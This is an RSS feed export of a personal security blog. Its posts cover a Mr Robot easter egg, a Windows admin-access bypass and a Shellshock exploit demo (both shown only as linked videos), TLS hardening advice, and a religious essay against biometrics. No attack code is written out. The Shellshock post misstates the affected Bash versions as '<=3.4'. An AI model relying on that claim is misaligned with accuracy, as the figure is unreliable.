<?xml version='1.0' encoding='UTF-8'?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/" xmlns:blogger="http://schemas.google.com/blogger/2008" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-8567398124063555856</atom:id><lastBuildDate>Wed, 02 Oct 2024 05:19:26 +0000</lastBuildDate><category>security</category><category>vulnerability</category><category>governments</category><category>privacy</category><category>surveillance</category><category>Linux</category><category>cyberwar</category><category>dystopia</category><category>hack</category><category>snowden</category><category>windows</category><category>HTTPS</category><category>HTTPS/2</category><category>access</category><category>backdoor</category><category>censor</category><category>greenwald</category><category>hacking</category><category>infrastructure</category><category>internet</category><category>md5</category><category>nsa</category><category>radar</category><category>scada</category><category>secret</category><category>software</category><category>APT</category><category>AV</category><category>BEAST</category><category>BIOS</category><category>Bash</category><category>Blog</category><category>CVE</category><category>DRAM</category><category>Ease of Access</category><category>Encryption</category><category>FREAK</category><category>Heartbleed</category><category>IP</category><category>Internet 2</category><category>MacOSX</category><category>POODLE</category><category>RC4</category><category>SSL</category><category>TLS</category><category>advanced</category><category>adware</category><category>alliance</category><category>apache</category><category>assange</category><category>attack</category><category>authentication 
bypass</category><category>behaviors</category><category>biometric</category><category>braintree</category><category>break points</category><category>bug</category><category>cat-mouse</category><category>china</category><category>ciphers</category><category>curl</category><category>darknet</category><category>deepweb</category><category>digital certificates</category><category>dubstep</category><category>easter eggs</category><category>exfiltration</category><category>fear</category><category>fido</category><category>five_eyes</category><category>flaw</category><category>freedoms</category><category>future</category><category>gop</category><category>hidden</category><category>http</category><category>humanity</category><category>i2p</category><category>inspector</category><category>iphone</category><category>javascript</category><category>knowledge</category><category>leblanc</category><category>lenovo</category><category>malware</category><category>manning</category><category>microsoft</category><category>mobile</category><category>mr robot</category><category>net_neutrality</category><category>netcat</category><category>networks</category><category>north korea</category><category>openSSL</category><category>passwords</category><category>patriot_act</category><category>paypal</category><category>persistent</category><category>phone</category><category>public</category><category>ransomware</category><category>remote code execution</category><category>reverse engineer</category><category>satellites</category><category>search engines</category><category>security by 
obscurity</category><category>server</category><category>sha</category><category>sha-3</category><category>shellshock</category><category>siemens</category><category>societies</category><category>sony</category><category>speech</category><category>superfish</category><category>target</category><category>testSSL</category><category>threats</category><category>tor</category><category>tpp</category><category>trans-pacific</category><category>trojan</category><category>us</category><category>wget</category><title>Hack The Planet: Security by Obscurity in the 21st Century</title><description></description><link>https://unsecuritynow.blogspot.com/</link><managingEditor>noreply@blogger.com (UnsecurityNow)</managingEditor><generator>Blogger</generator><openSearch:totalResults>17</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8567398124063555856.post-557250243498134043</guid><pubDate>Thu, 14 Jul 2016 19:37:00 +0000</pubDate><atom:updated>2016-07-14T14:37:57.945-05:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">break points</category><category domain="http://www.blogger.com/atom/ns#">dubstep</category><category domain="http://www.blogger.com/atom/ns#">easter eggs</category><category domain="http://www.blogger.com/atom/ns#">hack</category><category domain="http://www.blogger.com/atom/ns#">inspector</category><category domain="http://www.blogger.com/atom/ns#">javascript</category><category domain="http://www.blogger.com/atom/ns#">mr robot</category><category domain="http://www.blogger.com/atom/ns#">ransomware</category><title>Mr Robot Season 2 Easter Eggs: Ransomware Message Revealed and Decoded!</title><description>Hello folks!&amp;nbsp; I&#39;m sure you have heard about the most popular TV Show of 2015 and perhaps of 2016, multiple awards winning TV sensation of Mr Robot.&amp;nbsp; I don&#39;t like TV shows and 
don&#39;t watch TV at all, but I got caught up with Season 1 because of the hacking techniques the main character uses, which sound and seem pretty legitimate (as well as the terms).&amp;nbsp; So, Season 2 took off yesterday, but there has been a lot of work done on the Internet about it before then, not only on their &lt;a href=&quot;https://www.whoismrrobot.com/&quot; target=&quot;_blank&quot;&gt;website&lt;/a&gt;, but also &lt;a href=&quot;https://www.fsoc.sh/&quot; target=&quot;_blank&quot;&gt;outside&lt;/a&gt; &lt;a href=&quot;http://i239.bxjyb2jvda.net/&quot; target=&quot;_blank&quot;&gt;of it&lt;/a&gt;,&amp;nbsp; including Easter eggs!&amp;nbsp; Easter eggs are &quot;secrets&quot; buried in layers for people to find.&amp;nbsp; I have stumbled upon a few great surprises, but one was worth noting.&amp;nbsp; After they released Episode 1 before the air date, it kept me wondering...&lt;br /&gt;
&lt;br /&gt;
Episode 1 concludes with a ransomware attack on Evil Corp banks which leaves their computers inoperable.&amp;nbsp; I could take a screenshot of it and decided to investigate the victim&#39;s IP address (which is public, by the way) and found something interesting.&amp;nbsp; There seemed to be a message buried behind the timer, which resets every time you open the website, but what if I could stop the timer and let it go to 00:00:00? What would happen when the timer reaches 0?&amp;nbsp; Watch the video, learn a little about JS and base64 encoding (where the message is buried), grab some popcorn and enjoy the video.... Dubstep style!&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;iframe width=&quot;320&quot; height=&quot;266&quot; class=&quot;YOUTUBE-iframe-video&quot; data-thumbnail-src=&quot;https://i.ytimg.com/vi/HZbD4VAzxKo/0.jpg&quot; src=&quot;https://www.youtube.com/embed/HZbD4VAzxKo?feature=player_embedded&quot; frameborder=&quot;0&quot; allowfullscreen&gt;&lt;/iframe&gt;&lt;/div&gt;
&lt;br /&gt;</description><link>https://unsecuritynow.blogspot.com/2016/07/mr-robot-season-2-easter-eggs.html</link><author>noreply@blogger.com (UnsecurityNow)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img.youtube.com/vi/HZbD4VAzxKo/default.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8567398124063555856.post-6449223592869062766</guid><pubDate>Thu, 14 Jul 2016 18:45:00 +0000</pubDate><atom:updated>2016-07-14T14:38:53.690-05:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">authentication bypass</category><category domain="http://www.blogger.com/atom/ns#">BIOS</category><category domain="http://www.blogger.com/atom/ns#">Ease of Access</category><category domain="http://www.blogger.com/atom/ns#">hack</category><category domain="http://www.blogger.com/atom/ns#">Linux</category><category domain="http://www.blogger.com/atom/ns#">microsoft</category><category domain="http://www.blogger.com/atom/ns#">security by obscurity</category><category domain="http://www.blogger.com/atom/ns#">windows</category><title>How Can a 10 Year Old Have Administrator Access to Your Fortified Windows 8 and 10 Computer</title><description>Hello there. I have been a bit busy working and on side projects, so I would like to share with you some old work I have done before which I haven&#39;t shared on my Blog,&amp;nbsp; even though I have done a similar video with Windows 7.&amp;nbsp; This shows that the principle of this flaw does not rely on software but on the design of it.&amp;nbsp; Since Micro$oft is too busy fixing more &quot;relevant&quot; bugs, I am posting this only for educational purposes.&amp;nbsp; I am not responsible for, nor do I condone, illegal acts.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Now, watch and enjoy!&lt;br /&gt;
&lt;br /&gt;
Windows 8:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;iframe allowfullscreen=&quot;&quot; class=&quot;YOUTUBE-iframe-video&quot; data-thumbnail-src=&quot;https://i.ytimg.com/vi/EnseWVD9fr8/0.jpg&quot; frameborder=&quot;0&quot; height=&quot;266&quot; src=&quot;https://www.youtube.com/embed/EnseWVD9fr8?feature=player_embedded&quot; width=&quot;320&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
Windows 10:&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;iframe allowfullscreen=&quot;&quot; class=&quot;YOUTUBE-iframe-video&quot; data-thumbnail-src=&quot;https://i.ytimg.com/vi/8DD_SarB15Q/0.jpg&quot; frameborder=&quot;0&quot; height=&quot;266&quot; src=&quot;https://www.youtube.com/embed/8DD_SarB15Q?feature=player_embedded&quot; width=&quot;320&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;
&lt;br /&gt;</description><link>https://unsecuritynow.blogspot.com/2016/07/how-can-10-year-old-have-administrator.html</link><author>noreply@blogger.com (UnsecurityNow)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img.youtube.com/vi/EnseWVD9fr8/default.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8567398124063555856.post-3385781024546179411</guid><pubDate>Tue, 06 Oct 2015 18:06:00 +0000</pubDate><atom:updated>2015-10-07T18:13:47.969-05:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">AV</category><category domain="http://www.blogger.com/atom/ns#">BEAST</category><category domain="http://www.blogger.com/atom/ns#">ciphers</category><category domain="http://www.blogger.com/atom/ns#">digital certificates</category><category domain="http://www.blogger.com/atom/ns#">Encryption</category><category domain="http://www.blogger.com/atom/ns#">FREAK</category><category domain="http://www.blogger.com/atom/ns#">Heartbleed</category><category domain="http://www.blogger.com/atom/ns#">HTTPS</category><category domain="http://www.blogger.com/atom/ns#">HTTPS/2</category><category domain="http://www.blogger.com/atom/ns#">md5</category><category domain="http://www.blogger.com/atom/ns#">openSSL</category><category domain="http://www.blogger.com/atom/ns#">POODLE</category><category domain="http://www.blogger.com/atom/ns#">RC4</category><category domain="http://www.blogger.com/atom/ns#">security</category><category domain="http://www.blogger.com/atom/ns#">sha</category><category domain="http://www.blogger.com/atom/ns#">SSL</category><category domain="http://www.blogger.com/atom/ns#">testSSL</category><category domain="http://www.blogger.com/atom/ns#">TLS</category><title>How to determine your HTTPS is really secure</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;

&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcNKr-hEyRfaViZzvjkVbKYkyXTPVpVpESpq41o_vVXT4Suobf53TY77m_to_dY71MMOxRA5-KfyndvKZSd5O1tvaz0Fi9tn1CFMY3cwQQ1LRFM7t5PQWtenFQZNsYmEtY75cxZ422SJgt/s1600/insecure-tls.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcNKr-hEyRfaViZzvjkVbKYkyXTPVpVpESpq41o_vVXT4Suobf53TY77m_to_dY71MMOxRA5-KfyndvKZSd5O1tvaz0Fi9tn1CFMY3cwQQ1LRFM7t5PQWtenFQZNsYmEtY75cxZ422SJgt/s1600/insecure-tls.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
At a time when not even HTTPS is considered 100% secure, how do we determine that we are going through a secure connection?  How can we tell that our connection from point A to point B is not being eavesdropped on by a man in the middle? Nowadays, regular and more IT-inclined users alike must be aware of the dangers and how to mitigate them. With recent vulnerabilities such as FREAK and Heartbleed, how can we know that TLS/SSL security is not being downgraded after we click a link? Well, read on.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Definitions&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
So, how do we determine if a connection is secure or insecure? First of all: what is considered insecure? Well, we know that a secure HTTPS connection includes the SSL/TLS data encryption and authentication protocols. We also know that the SSL (Secure Socket Layer) protocol is the predecessor of TLS (Transport Layer Security). We now know that SSL (even its last version 3.0) is really insecure from what we&#39;ve seen in old and recent bugs and vulnerabilities such as &lt;b&gt;&lt;a href=&quot;https://isc.sans.edu/forums/diary/SSLv3+POODLE+Vulnerability+Official+Release/18827/&quot; target=&quot;_blank&quot;&gt;POODLE&lt;/a&gt;&lt;/b&gt;, &lt;a href=&quot;http://www.webopedia.com/TERM/S/ssl_beast.html&quot; target=&quot;_blank&quot;&gt;&lt;b&gt;BEAST&lt;/b&gt;&lt;/a&gt;, &lt;a href=&quot;http://heartbleed.com/&quot; target=&quot;_blank&quot;&gt;&lt;b&gt;Heartbleed&lt;/b&gt;&lt;/a&gt; and &lt;a href=&quot;https://freakattack.com/&quot; target=&quot;_blank&quot;&gt;&lt;b&gt;FREAK&lt;/b&gt;&lt;/a&gt;. We also know that TLS 1.2 is the most secure protocol (so far) used for HTTPS communications. But things are not as easy as they might seem: even TLS v1.2 (if not properly configured) can be a target for BEAST attacks.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEig_686VyrUrOooJY7YB4fG6SAIH4RyLmbgJsAQoSzRbqcSRYES08XHcKtCbPrXUCnWC-2r_D2GMbMFDsVVGNbSubXM9ReGr7krB__e-X12PZYfAMkgyfpAjldSbE2axhmm3Av5QhWMegfa/s1600/freak-vulnerability-continuum.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;304&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEig_686VyrUrOooJY7YB4fG6SAIH4RyLmbgJsAQoSzRbqcSRYES08XHcKtCbPrXUCnWC-2r_D2GMbMFDsVVGNbSubXM9ReGr7krB__e-X12PZYfAMkgyfpAjldSbE2axhmm3Av5QhWMegfa/s640/freak-vulnerability-continuum.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Determining Vulnerability Vectors&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
Depending on the attack, bug or vulnerability, there are many different ways to compromise a system, but the vectors associated with them must be accounted for. For example, if you&#39;re susceptible to a MiTM (Man-in-the-middle) attack, the attacker can potentially downgrade your secure connection, leaving your system unprotected from the aforementioned attacks. This is called a &quot;&lt;a href=&quot;https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack#MITM%20TLS%20Protocol%20Downgrade%20Attack&quot; target=&quot;_blank&quot;&gt;Downgrade Attack&lt;/a&gt;&quot;. Also, believe it or not&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Plan of Action&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
In order to have a plan of action, it is very important to determine what products are installed on your computer(s).&amp;nbsp; Keeping the number of browsers to a minimum (is there a reason to have 3 different browsers on your computer?) mitigates risk. This is because we do not always remember to update our browsers, or we simply assume that if our Operating System is patched, our browser(s) are too.&lt;br /&gt;
&lt;br /&gt;
&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;float: left; margin-right: 1em; text-align: left;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-SN0MZ-eknts/VhQPEeqHPDI/AAAAAAAAAVI/UFHvlKndMYc/s1600/ChromeTLS.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;http://2.bp.blogspot.com/-SN0MZ-eknts/VhQPEeqHPDI/AAAAAAAAAVI/UFHvlKndMYc/s320/ChromeTLS.png&quot; width=&quot;258&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;Check SSL/TLS in Chrome&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;br /&gt;


&lt;br /&gt;
&lt;table cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-Jeb3Ek_h_lM/VhQPkhMhPrI/AAAAAAAAAVQ/gi89RrUIhss/s1600/Firefoxciphersuite.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;289&quot; src=&quot;http://3.bp.blogspot.com/-Jeb3Ek_h_lM/VhQPkhMhPrI/AAAAAAAAAVQ/gi89RrUIhss/s320/Firefoxciphersuite.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;font-size: 12.8px;&quot;&gt;Check SSL/TLS in Firefox&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
This is a common mistake for amateurs and rookies in the subject, but they must be aware of the risks and take action. &amp;nbsp;Also, by running the OpenSSL and TestSSL utilities, we can determine which SSL/TLS ciphers are at risk, for example RC4-MD5 or RC4-SHA. &amp;nbsp;Also, protocols such as TLS 1.0 are not secure anymore and you should rely on 1.2 at least. These utilities will help you know what should be changed in order to have a somewhat more secure web application.&lt;br /&gt;
&lt;br /&gt;
You have to be careful because if your web application uses the RC4 Cipher Suite, the connection might not be as secure as you might think. &amp;nbsp;The output RC4 generates is not truly pseudo-random: the first 65 bytes can be decrypted in order to obtain passwords or cookie information, stealing the session. &amp;nbsp;This &quot;Invariance Weakness&quot; leads to an attack called Bar Mitzvah, which can be used to steal your session information.&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://1.bp.blogspot.com/-l2A9kjP6Hb8/VhQUBlhAkVI/AAAAAAAAAVo/UbwtGv85eqQ/s1600/Bar-Mitzvah-cifrado-SSL-TLS-655x407.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;396&quot; src=&quot;http://1.bp.blogspot.com/-l2A9kjP6Hb8/VhQUBlhAkVI/AAAAAAAAAVo/UbwtGv85eqQ/s640/Bar-Mitzvah-cifrado-SSL-TLS-655x407.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-60MEiMDMPUY/VhQSbiff-YI/AAAAAAAAAVc/JN9jYzVV7aE/s1600/Bar-mitzvah.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;426&quot; src=&quot;http://4.bp.blogspot.com/-60MEiMDMPUY/VhQSbiff-YI/AAAAAAAAAVc/JN9jYzVV7aE/s640/Bar-mitzvah.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;In the Bar Mitzvah attack, it only takes 65 bytes to decrypt data (after the handshake), stealing cookies or passwords.&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;
The plan of action for RC4 is to totally deactivate it in order to mitigate these risks.&lt;/div&gt;
&lt;center&gt;
&lt;b&gt;Sources&lt;/b&gt;&lt;/center&gt;
&lt;br /&gt;
&lt;br /&gt;
Definition of POODLE: https://isc.sans.edu/forums/diary/SSLv3+POODLE+Vulnerability+Official+Release/18827/&lt;br /&gt;
&lt;br /&gt;
Definition of BEAST:&amp;nbsp; http://www.webopedia.com/TERM/S/ssl_beast.html&lt;br /&gt;
&lt;br /&gt;
Definition of Heartbleed: http://heartbleed.com&lt;br /&gt;
&lt;br /&gt;
Definition of FREAK: https://freakattack.com/&lt;br /&gt;
&lt;br /&gt;
Downgrade Attack: https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack#MITM%20TLS%20Protocol%20Downgrade%20Attack&lt;br /&gt;
&lt;br /&gt;
OpenSSL:&amp;nbsp;https://www.openssl.org&lt;br /&gt;
&lt;br /&gt;
TestSSL:&amp;nbsp;https://testssl.sh&lt;br /&gt;
&lt;br /&gt;
RC4 Vulnerability: http://securityaffairs.co/wordpress/35352/hacking/bar-mitzvah-attack-on-rc4.html&lt;/div&gt;</description><link>https://unsecuritynow.blogspot.com/2015/10/how-to-determine-your-https-is-really.html</link><author>noreply@blogger.com (UnsecurityNow)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcNKr-hEyRfaViZzvjkVbKYkyXTPVpVpESpq41o_vVXT4Suobf53TY77m_to_dY71MMOxRA5-KfyndvKZSd5O1tvaz0Fi9tn1CFMY3cwQQ1LRFM7t5PQWtenFQZNsYmEtY75cxZ422SJgt/s72-c/insecure-tls.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8567398124063555856.post-8427710413387480186</guid><pubDate>Tue, 07 Jul 2015 04:14:00 +0000</pubDate><atom:updated>2016-01-28T14:55:29.552-06:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">apache</category><category domain="http://www.blogger.com/atom/ns#">backdoor</category><category domain="http://www.blogger.com/atom/ns#">Bash</category><category domain="http://www.blogger.com/atom/ns#">bug</category><category domain="http://www.blogger.com/atom/ns#">curl</category><category domain="http://www.blogger.com/atom/ns#">CVE</category><category domain="http://www.blogger.com/atom/ns#">http</category><category domain="http://www.blogger.com/atom/ns#">Linux</category><category domain="http://www.blogger.com/atom/ns#">MacOSX</category><category domain="http://www.blogger.com/atom/ns#">netcat</category><category domain="http://www.blogger.com/atom/ns#">remote code execution</category><category domain="http://www.blogger.com/atom/ns#">shellshock</category><category domain="http://www.blogger.com/atom/ns#">wget</category><title>BASH ShellShock Bug</title><description>By this time we all know that the BASH Shellshock Bug is now history, but think again. There are times when I have found servers with their BASH outdated. 
Since we know the versions affected are &amp;lt;=3.4, the good news is that it can be easily mitigated. By just updating BASH, you are already ahead of the game. The sad thing: not everybody updates their system accordingly. Believe it or not, lots of companies still don&#39;t have their systems patched and this has to change. They have to start being more conscious of their customers and clients and stop being lazy.&lt;br /&gt;
In this video, I will show you what the Shellshock Bug is, the risks of it, how to penetrate a vulnerable system as well as how to mitigate it. Enjoy!&lt;br /&gt;
&lt;br /&gt;
&lt;iframe allowfullscreen=&quot;&quot; frameborder=&quot;0&quot; height=&quot;344&quot; src=&quot;https://www.youtube.com/embed/Dp-kDmIfkoA&quot; width=&quot;459&quot;&gt;&lt;/iframe&gt;</description><link>https://unsecuritynow.blogspot.com/2015/07/bash-shellshock-bug.html</link><author>noreply@blogger.com (UnsecurityNow)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img.youtube.com/vi/Dp-kDmIfkoA/default.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8567398124063555856.post-1817280319983451976</guid><pubDate>Fri, 10 Apr 2015 19:17:00 +0000</pubDate><atom:updated>2015-04-19T12:05:55.041-05:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">access</category><category domain="http://www.blogger.com/atom/ns#">alliance</category><category domain="http://www.blogger.com/atom/ns#">behaviors</category><category domain="http://www.blogger.com/atom/ns#">biometric</category><category domain="http://www.blogger.com/atom/ns#">braintree</category><category domain="http://www.blogger.com/atom/ns#">dystopia</category><category domain="http://www.blogger.com/atom/ns#">fear</category><category domain="http://www.blogger.com/atom/ns#">fido</category><category domain="http://www.blogger.com/atom/ns#">future</category><category domain="http://www.blogger.com/atom/ns#">humanity</category><category domain="http://www.blogger.com/atom/ns#">leblanc</category><category domain="http://www.blogger.com/atom/ns#">md5</category><category domain="http://www.blogger.com/atom/ns#">mobile</category><category domain="http://www.blogger.com/atom/ns#">passwords</category><category domain="http://www.blogger.com/atom/ns#">paypal</category><category domain="http://www.blogger.com/atom/ns#">privacy</category><category domain="http://www.blogger.com/atom/ns#">public</category><category domain="http://www.blogger.com/atom/ns#">secret</category><category 
domain="http://www.blogger.com/atom/ns#">sha-3</category><category domain="http://www.blogger.com/atom/ns#">vulnerability</category><title>Getting Closer to a New Machine Era</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZpY05nehf1Dh75hZR0kuCBZ1BP0eL70Ar79_GjwyAZU0pqs4v5znvAdA8RaJwliPqXusPdRtxP7RjDFIlXRqF-kQ-c9xHi02PIu4bvQD6kDnDN-2QYTJ8iW1_3Tz3ZzgOz1BMQLNH9ul7/s1600/666-chip.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZpY05nehf1Dh75hZR0kuCBZ1BP0eL70Ar79_GjwyAZU0pqs4v5znvAdA8RaJwliPqXusPdRtxP7RjDFIlXRqF-kQ-c9xHi02PIu4bvQD6kDnDN-2QYTJ8iW1_3Tz3ZzgOz1BMQLNH9ul7/s1600/666-chip.jpg&quot; height=&quot;360&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&quot;Also it causes all, both small and great, both rich and poor, both free 
and slave, to be marked on the right hand or the forehead, so that no 
one can buy or sell unless he has the mark, that is, the name of the 
beast or the number of its name. This calls for wisdom: let the one who 
has understanding calculate the number of the beast, for it is the 
number of a man, and his number is 666.&quot; &amp;nbsp; -Revelations 13:16-18&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;A Word from the Blogger&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
We are entering a new phase.&amp;nbsp; As passwords slowly become obsolete because of their nature of being insecure and hard to remember, a new era is emerging which will bring a lot of controversy.&amp;nbsp; Since biometric methods of authentication haven&#39;t delivered what they promised,&amp;nbsp; have also been proven to fail many times in these few years, and we have seen how easily they can be bypassed in the last few months, we are now left to wonder:&amp;nbsp; how are we supposed to store our information and do our &quot;private&quot; actions through the Internet without having our account (which, by the way, now contains everything we do) compromised?&lt;br /&gt;
&lt;br /&gt;
&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgORzq6MI9cRRcUP_isH4pdN8L10PVisPO81_-8SV_gWHkn7H-Tl88AgZINKOv64oEAul5-NsjtT1bZV9m_TNs_fYnF4yd3wMRlRhSaQy8yLQgzfSLkaUxeEcmC-ZXz0UZD512JWRnTWH2W/s1600/130313_TRP_robotRevolutionW.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgORzq6MI9cRRcUP_isH4pdN8L10PVisPO81_-8SV_gWHkn7H-Tl88AgZINKOv64oEAul5-NsjtT1bZV9m_TNs_fYnF4yd3wMRlRhSaQy8yLQgzfSLkaUxeEcmC-ZXz0UZD512JWRnTWH2W/s1600/130313_TRP_robotRevolutionW.jpg&quot; height=&quot;210&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;www.slate.com&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;br /&gt;
Even though I really love technology and I enjoy experimenting with it, I am completely against the ideology of merging humans with robots.&amp;nbsp; I am completely against the ideology of having robotic parts embedded into our body to surpass our average capabilities and nature of being what we are... humans.&amp;nbsp; Merging embedded robotic parts with our body to make ourselves &quot;more efficient&quot; is a mockery of God because of the arrogance and pride of wishing to be not only like God but better than God.&amp;nbsp; If God wanted us to be robots, he would have created robotic parts in ourselves.&amp;nbsp; Also, it goes against the laws of nature, which are also enforced, controlled and mediated by God. If the laws of nature are altered, an endless domino reaction of cataclysms would occur.&lt;br /&gt;
&lt;br /&gt;
